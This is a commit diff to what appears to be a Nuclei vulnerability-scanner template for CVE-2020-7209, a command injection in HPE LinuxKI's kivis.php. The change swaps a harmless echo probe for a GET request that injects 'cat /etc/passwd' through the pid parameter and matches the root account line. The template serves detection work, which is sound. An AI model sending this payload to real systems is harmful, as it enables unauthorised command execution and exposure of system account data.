Update CVE-2020-7209.yaml
parent
3f977fcf62
commit
d7a44ae025
|
@ -9,19 +9,17 @@ info:
|
||||||
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
||||||
|
|
||||||
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
||||||
|
# venedor: https://www.hpe.com/us/en/home.html
|
||||||
|
# softwar: https://github.com/HewlettPackard/LinuxKI
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d"
|
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"
|
||||||
headers:
|
|
||||||
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: regex
|
||||||
words:
|
regex:
|
||||||
- "nonexistent"
|
- "root:[x*]:0:0:"
|
||||||
part: body
|
part: body
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
Loading…
Reference in New Issue